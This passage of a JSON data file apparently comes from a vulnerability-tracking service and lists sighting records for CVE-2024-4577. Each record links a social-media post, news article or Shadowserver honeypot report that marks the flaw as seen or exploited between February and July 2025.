"CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lk4bk5rug22x", "content": "", "creation_timestamp": "2025-03-11T14:26:36.002037Z"}, {"uuid": "330f6f8d-5694-44b6-a4e1-97be38a8fcaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-24)", "content": "", "creation_timestamp": "2025-03-24T00:00:00.000000Z"}, {"uuid": "c5872a16-f93e-4cff-862c-53fff827546f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-20)", "content": "", "creation_timestamp": "2025-02-20T00:00:00.000000Z"}, {"uuid": "21d6ed79-16bb-41ec-a9c5-0f8c61dacaea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lldvpejinyx2", "content": "", "creation_timestamp": "2025-03-27T08:41:25.126918Z"}, {"uuid": "188bdb7a-fedf-4004-b81c-83e8769da70e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-20)", "content": "", "creation_timestamp": "2025-03-20T00:00:00.000000Z"}, {"uuid": "0688cc87-2764-4dac-a4d8-e43c9398ca04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-21)", "content": "", "creation_timestamp": "2025-02-21T00:00:00.000000Z"}, {"uuid": "7ef9915f-26d5-4923-bb20-82adc8aed7e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/defendopsdiaries.bsky.social/post/3lk4cbdu67u2o", "content": "", "creation_timestamp": "2025-03-11T14:39:34.172139Z"}, {"uuid": "167b1c5b-3031-4b96-a239-1ad971d1022b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lk4cciu32a26", "content": "", "creation_timestamp": "2025-03-11T14:40:12.428914Z"}, {"uuid": "95245519-6dec-4d94-881c-2c9f2cf6e288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3ljukbbiwfc2l", "content": "", "creation_timestamp": "2025-03-08T12:41:25.236769Z"}, {"uuid": "974ced14-853c-4a6c-8f16-9d8bff85df5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://thehackernews.com/2025/03/php-cgi-rce-flaw-exploited-in-attacks.html", "content": "", "creation_timestamp": "2025-03-07T03:42:00.000000Z"}, {"uuid": "28852417-9b00-45e5-b138-4b9fd7d94478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ljznm3h37c24", "content": "", "creation_timestamp": "2025-03-10T13:24:28.528984Z"}, {"uuid": "5d837cd2-ead8-4e3b-a55e-d19dc463092f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3lk4cw5phis2s", "content": "", "creation_timestamp": "2025-03-11T14:51:13.051505Z"}, {"uuid": "7c2ba5e8-a246-44ee-a449-0b0d4c5b45a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3lk4eclh26l2j", "content": "", "creation_timestamp": "2025-03-11T15:16:02.790312Z"}, {"uuid": "025d150a-c7b3-4b20-90b4-61574ba42989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-23)", "content": "", "creation_timestamp": "2025-02-23T00:00:00.000000Z"}, {"uuid": "905020d4-ebf2-4902-9802-b3477e0c646b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-22)", "content": "", "creation_timestamp": "2025-03-22T00:00:00.000000Z"}, {"uuid": "1f15c257-653c-4002-8bcc-124a5157478f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-23)", "content": "", "creation_timestamp": "2025-02-23T00:00:00.000000Z"}, {"uuid": "47f05d1e-61e4-41f9-9f66-737d2c625842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3ljzu6ftzh62d", "content": "", "creation_timestamp": "2025-03-10T15:22:04.357191Z"}, {"uuid": "0757623a-d502-41c8-8e5a-5ddd17bbd741", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ljzuut3pdn2m", "content": "", "creation_timestamp": "2025-03-10T15:34:35.879575Z"}, {"uuid": "489a5ad2-3bd8-4426-8a2e-bfde45ac4417", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/matricedigitale.bsky.social/post/3lk4jcwhyep2w", "content": "", "creation_timestamp": "2025-03-11T16:45:43.575433Z"}, {"uuid": "b1724d3d-db68-4833-bdea-dc512764e2c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/matricedigitale.bsky.social/post/3lk4jdl7gmq2h", "content": "", "creation_timestamp": "2025-03-11T16:46:04.648061Z"}, {"uuid": "693ee2af-b1cc-43ff-b29c-f5bfdc8a1741", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://threatintel.cc/2025/03/11/critical-php-vulnerability-under-mass.html", "content": "", "creation_timestamp": "2025-03-11T10:55:49.000000Z"}, {"uuid": "51d38a69-7381-4804-ac1a-b0ecd9cb2c73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:55.000000Z"}, {"uuid": "35bf091e-4df0-4091-93ae-c6d5321ee68c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-28)", "content": "", "creation_timestamp": "2025-02-28T00:00:00.000000Z"}, {"uuid": "bcb804af-e5ca-4060-9344-9a537860b103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://mastodon.social/users/hrbrmstr/statuses/114139053601522004", "content": "", "creation_timestamp": "2025-03-10T16:22:26.360622Z"}, {"uuid": "5d301acd-1773-4260-89d0-4f655752b8c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/hrbrmstr.dev/post/3ljzxl2i35q2h", "content": "", "creation_timestamp": "2025-03-10T16:22:49.545851Z"}, {"uuid": "0c048a82-bca2-423c-bb85-5baa2533223d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-21)", "content": "", "creation_timestamp": "2025-03-21T00:00:00.000000Z"}, {"uuid": "24070c06-a8eb-4f9a-9d94-de3ee8da31e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/techtales.bsky.social/post/3ljzxnabqlb2p", "content": "", "creation_timestamp": "2025-03-10T16:24:04.103120Z"}, {"uuid": "094836a3-5b70-46df-8e4d-d26beaf18200", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-17)", "content": "", "creation_timestamp": "2025-03-17T00:00:00.000000Z"}, {"uuid": "f8f2add1-dbed-41b0-b125-887ea10fb5b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/patrickcmiller.bsky.social/post/3ljzyng4wyo2k", "content": "", "creation_timestamp": "2025-03-10T16:42:02.482814Z"}, {"uuid": "8796cb13-51a4-4dcf-bebf-9e627e3ce77c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-4577", "type": "seen", "source": "https://infosec.exchange/users/patrickcmiller/statuses/114139130918406420", "content": "", "creation_timestamp": "2025-03-10T16:42:03.496129Z"}, {"uuid": "4b11245a-8cf5-42ed-91be-1664f453dc87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://thehackernews.com/2025/03/hackers-exploit-severe-php-flaw-to.html", "content": "", "creation_timestamp": "2025-03-19T14:52:00.000000Z"}, {"uuid": "465e0f75-84e1-4aed-8c14-5a0a8776ac3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-25)", "content": "", "creation_timestamp": "2025-02-25T00:00:00.000000Z"}, {"uuid": "c3e3b4fe-9175-4276-8d88-36055c499d1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3lk2ba6sz6i2q", "content": "", "creation_timestamp": "2025-03-10T19:15:42.768974Z"}, {"uuid": "b0e99ee3-d650-4840-b6aa-38d143b110d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-02)", "content": "", "creation_timestamp": "2025-03-02T00:00:00.000000Z"}, {"uuid": "b8bb462e-78cf-45ec-9db6-63a5d005447c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-06)", "content": "", "creation_timestamp": "2025-03-06T00:00:00.000000Z"}, {"uuid": "66e9edaf-2f30-4a5a-8675-4321fead2c00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-4577", "type": "seen", "source": "https://bsky.app/profile/Android.activitypub.awakari.com.ap.brid.gy/post/3lknnmllrmat2", "content": "", "creation_timestamp": "2025-03-18T12:18:09.164752Z"}, {"uuid": "c928e6fe-4d0c-4a53-b455-ccb4ad886bf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-01)", "content": "", "creation_timestamp": "2025-03-01T00:00:00.000000Z"}, {"uuid": "2c2363b5-9a6e-477d-a6c7-4cde552520b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-27)", "content": "", "creation_timestamp": "2025-03-27T00:00:00.000000Z"}, {"uuid": "6bd014a8-5ff0-4bb7-8ed8-751b5a490169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-31)", "content": "", "creation_timestamp": "2025-03-31T00:00:00.000000Z"}, {"uuid": "f2bea6b9-6b64-480b-aff8-9f20b8cd8643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-28)", "content": "", "creation_timestamp": "2025-03-28T00:00:00.000000Z"}, {"uuid": "0b7a19c1-7481-43de-98da-cbe882f5df17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/114839935133955293", "content": "", "creation_timestamp": "2025-07-12T11:05:47.473194Z"}, {"uuid": "781bc461-4432-4c8a-9dd4-c5da6b1c2c07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-01)", "content": "", "creation_timestamp": "2025-04-01T00:00:00.000000Z"}, {"uuid": "01adc6f6-e9c6-407f-98cd-73b772a44cf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-01)", "content": "", "creation_timestamp": "2025-06-01T00:00:00.000000Z"}, {"uuid": "8853a593-e115-4998-8ca2-f4663634f841", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-09)", "content": "", "creation_timestamp": "2025-06-09T00:00:00.000000Z"}, {"uuid": "7527e425-4083-4b7f-8675-0f379271ac8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-02)", "content": "", "creation_timestamp": "2025-04-02T00:00:00.000000Z"}, {"uuid": "0807b7a9-3d6b-4f9a-8f98-54e415fb6f88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-11)", "content": "", "creation_timestamp": "2025-07-11T00:00:00.000000Z"}, {"uuid": "4cf7eadb-81e3-48bf-badb-e8d03fde5c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-04)", "content": "", "creation_timestamp": "2025-04-04T00:00:00.000000Z"}, {"uuid": "5528e555-ba56-437c-b798-cf59e015531f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-21)", "content": "", "creation_timestamp": "2025-06-21T00:00:00.000000Z"}, {"uuid": "60ad78a3-72c9-49e2-954d-0d3aced1005c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-05)", "content": "", "creation_timestamp": "2025-04-05T00:00:00.000000Z"}, {"uuid": "85585f4b-b40a-4482-91df-095e2b7cdd07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-06)", "content": "", "creation_timestamp": "2025-04-06T00:00:00.000000Z"}, {"uuid": "7a9026f5-2fab-44d7-882e-86ad2d141762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-07)", "content": "", "creation_timestamp": "2025-04-07T00:00:00.000000Z"}, {"uuid": "462eebb5-3e41-4ccf-867a-6228eccf32bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/expelsecurity.bsky.social/post/3lmde23gph22h", "content": "", "creation_timestamp": "2025-04-08T20:50:20.584653Z"}, {"uuid": "e9073a61-896f-4b91-9f8c-5dd5c4ac6dfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-08)", "content": "", "creation_timestamp": "2025-04-08T00:00:00.000000Z"}, {"uuid": "e590ff63-e1e8-4dd2-8865-3b8000c7776f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-23)", "content": "", "creation_timestamp": "2025-05-23T00:00:00.000000Z"}, {"uuid": "e2116015-124c-4f9c-8c3e-398c02e9562a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-09)", "content": "", "creation_timestamp": "2025-04-09T00:00:00.000000Z"}, {"uuid": "a5fd98a9-2a58-4cea-8c98-d8a254d08c87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lrquv7ghem2i", "content": "", "creation_timestamp": "2025-06-16T21:02:26.309987Z"}, {"uuid": "2d736abc-f313-4067-af01-5c4437ed91df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-10)", "content": "", "creation_timestamp": "2025-04-10T00:00:00.000000Z"}, {"uuid": "6715add4-1571-4962-a618-7fb4633056ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-11)", "content": "", "creation_timestamp": "2025-04-11T00:00:00.000000Z"}, {"uuid": "8042bed7-343a-4c66-9987-b92879282351", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-07)", "content": "", "creation_timestamp": "2025-06-07T00:00:00.000000Z"}, {"uuid": "c72d7276-299a-4757-bd4e-9ebeca77e7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "6115b90d-a59d-4f61-849f-388eb05a4e5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-13)", "content": "", "creation_timestamp": "2025-04-13T00:00:00.000000Z"}, {"uuid": "4a876963-f8cd-4092-8341-6ae58bd846c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-17)", "content": "", "creation_timestamp": "2025-06-17T00:00:00.000000Z"}, {"uuid": "a3fc3eed-75c6-4771-81a5-41ba310ca931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-14)", "content": "", "creation_timestamp": "2025-04-14T00:00:00.000000Z"}, {"uuid": "825d2759-a07f-4f6a-9397-1b0abdf0ae06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-01)", "content": "", "creation_timestamp": "2025-07-01T00:00:00.000000Z"}, {"uuid": "b034f312-916e-4d9b-bb98-f74c01614ba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-15)", "content": "", "creation_timestamp": "2025-04-15T00:00:00.000000Z"}, {"uuid": "f5c566f5-4b86-472f-a18c-b8c1953c36cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-13)", "content": "", "creation_timestamp": "2025-06-13T00:00:00.000000Z"}, {"uuid": "4af70735-18ee-48a7-807a-fe259b71566a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-16)", "content": "", "creation_timestamp": "2025-04-16T00:00:00.000000Z"}, {"uuid": "0bcd5af3-68ea-45fd-bdfb-a45d66f461d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-17)", "content": "", "creation_timestamp": "2025-04-17T00:00:00.000000Z"}, {"uuid": "e61fd8b0-ef0f-460a-94a2-01075df160ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-18)", "content": "", "creation_timestamp": "2025-04-18T00:00:00.000000Z"}, {"uuid": "a9767f3d-1718-4824-8fd1-eb53543ffc8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-19)", "content": "", "creation_timestamp": "2025-04-19T00:00:00.000000Z"}, {"uuid": "f4be7c3a-ce57-43c9-8ac6-c2d89d422b44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-19)", "content": "", "creation_timestamp": "2025-06-19T00:00:00.000000Z"}, {"uuid": "76dea311-e3f5-4310-b7c0-8ac50fcd3857", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "ad675129-3ece-4263-bc24-ebe0d7f5327a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-16)", "content": "", "creation_timestamp": "2025-06-16T00:00:00.000000Z"}, {"uuid": "fa8943a5-4e31-4717-9be7-ccede26d7ef3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-30)", "content": 